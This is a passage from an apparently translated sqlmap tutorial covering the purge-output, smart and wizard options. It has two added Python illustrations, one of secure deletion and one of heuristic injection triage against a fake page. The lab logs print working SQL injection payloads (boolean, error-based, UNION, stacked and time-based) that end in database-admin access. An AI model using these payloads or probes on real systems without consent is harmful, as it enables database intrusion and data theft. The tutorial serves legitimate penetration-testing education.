[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
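The sequence of steps in that log, reproduced as an added example that is not sqlmap's own purge routine: make each file writable, overwrite its contents with random bytes, truncate it, rename files and then directories to random names, and finally delete the tree. It runs on a throw-away temporary directory populated with constructed files laid out like an output folder, and returns what it did so the result can be checked.

```python
"""
Added example (not sqlmap's lib/core/purge.py) of a secure-delete pass over a
directory tree, following the steps shown in the --purge-output log above.
"""
import os
import secrets
import shutil
import stat
import tempfile


def _random_name():
    return secrets.token_hex(6)


def purge_directory(directory):
    """Wipe `directory` in place and remove it; returns (files_wiped, dirs_renamed)."""
    files_wiped = 0
    dirs_renamed = 0
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)     # changing file attributes
            size = os.path.getsize(path)
            with open(path, "wb") as fh:                      # writing random data to files
                fh.write(os.urandom(size))
                fh.flush()
                os.fsync(fh.fileno())
            with open(path, "wb"):                            # truncating files
                pass
            os.rename(path, os.path.join(root, _random_name()))   # renaming filenames
            files_wiped += 1
    # Bottom-up so a parent's rename never invalidates a child path we still need.
    for root, dirs, _files in os.walk(directory, topdown=False):
        for name in dirs:
            os.rename(os.path.join(root, name), os.path.join(root, _random_name()))  # renaming directory names
            dirs_renamed += 1
    shutil.rmtree(directory)                                  # deleting the whole directory tree
    return files_wiped, dirs_renamed


def demo():
    """Build a constructed output-like tree in a temp dir, purge it, report the outcome."""
    base = tempfile.mkdtemp(prefix="sqlmap-output-")
    os.makedirs(os.path.join(base, "192.168.21.129", "dump"))
    for rel in ("192.168.21.129/log", "192.168.21.129/session.sqlite", "192.168.21.129/dump/users.csv"):
        with open(os.path.join(base, rel), "w") as fh:
            fh.write("sensitive result data\n")
    result = purge_directory(base)
    return result, os.path.exists(base)


if __name__ == "__main__":
    print(demo())
```

Overwriting in place is only as good as the filesystem lets it be: on journaling or copy-on-write filesystems and on SSDs with wear levelling, the old blocks may survive elsewhere, so for genuinely sensitive engagements keep the output directory on an encrypted volume rather than relying on a purge afterwards.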

Heuristic injection testing
Option: --smart

When a large number of URLs has to be tested, --smart saves time by running the full set of injection tests only on parameters for which the quick heuristic check is positive (a DBMS error shows up in the response); parameters that are not dynamic, or do not react to the heuristic probe, are skipped. Example:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
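The two quick decisions the --smart run above makes before spending time on a parameter, as an added example that is not sqlmap's own checks: is the parameter dynamic (does changing its value change the page at all), and does a basic heuristic probe (the value with quote and parenthesis characters appended) make a DBMS error appear? The request function is a constructed stand-in for the target page, where only id reaches SQL and ca and user are ignored; the error hints are a small illustrative subset.

```python
"""
Added example (not sqlmap's code): dynamicity check plus basic heuristic probe,
the triage that --smart uses to decide which parameters deserve full testing.
"""
import difflib
import random
import re

# Illustrative DBMS error hints (a tiny subset of sqlmap's error knowledge base).
DBMS_ERROR_HINTS = [
    ("MySQL", re.compile(r"You have an error in your SQL syntax|mysql_fetch_array\(\)", re.I)),
    ("PostgreSQL", re.compile(r"pg_query\(\)|PostgreSQL query failed", re.I)),
    ("Microsoft SQL Server", re.compile(r"Unclosed quotation mark|Microsoft OLE DB Provider", re.I)),
]

# Characters sqlmap's basic heuristic appends (quotes/parentheses) to break the query.
HEURISTIC_JUNK = "'\")("


def is_dynamic(request, params, name, threshold=0.98):
    """A parameter is dynamic if a random value for it changes the page noticeably."""
    original = request(params)
    changed = request(dict(params, **{name: str(random.randint(10000, 99999))}))
    return difflib.SequenceMatcher(None, original, changed).ratio() < threshold


def heuristic_probe(request, params, name):
    """Append junk to the value; return the DBMS hinted by any error in the response, else None."""
    page = request(dict(params, **{name: params[name] + HEURISTIC_JUNK}))
    for dbms, pattern in DBMS_ERROR_HINTS:
        if pattern.search(page):
            return dbms
    return None


def smart_triage(request, params):
    """Decide per parameter whether it is worth the full battery of tests."""
    decisions = {}
    for name in params:
        if not is_dynamic(request, params, name):
            decisions[name] = "skipped: not dynamic"
            continue
        dbms = heuristic_probe(request, params, name)
        decisions[name] = ("test (possible DBMS: %s)" % dbms) if dbms else "skipped: no error on heuristic probe"
    return decisions


# Constructed stand-in for get_int.php: 'id' is interpolated into SQL unquoted,
# 'ca' and 'user' never reach the database.
ITEMS = {1: "Widget", 2: "Gadget", 3: "Sprocket"}


def fake_request(params):
    raw = params.get("id", "1")
    if "'" in raw or '"' in raw:   # broken quoting -> the PHP warning leaks into the page
        return "<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource"
    try:
        item = ITEMS.get(int(raw), "")
    except ValueError:
        item = ""
    return "<html><body><h1>Item</h1><p>%s</p></body></html>" % item


if __name__ == "__main__":
    print(smart_triage(fake_request, {"ca": "17", "user": "foo", "id": "1"}))
```

This is exactly the trade-off --smart makes: a blind injection point with no visible error (a well-configured application) would be skipped here too, so use --smart for breadth across many targets and drop it when a single target matters.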

Wizard for beginners
Option: --wizard

An interactive mode for beginners that walks step by step through the settings needed to test a target.

$ python sqlmap.py --wizard

sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2986=2986

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'--

Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58))

web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:

Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)

current user: 'sa'
current database: 'testdb'
current user is DBA: True

[*] shutting down at 11:25:52
Source: http://drops.wooyun.org/tips/401

This article was collected and compiled by the information security team of the Network Security Attack and Defense Research Lab (www.91ri.org); please credit the source when reposting.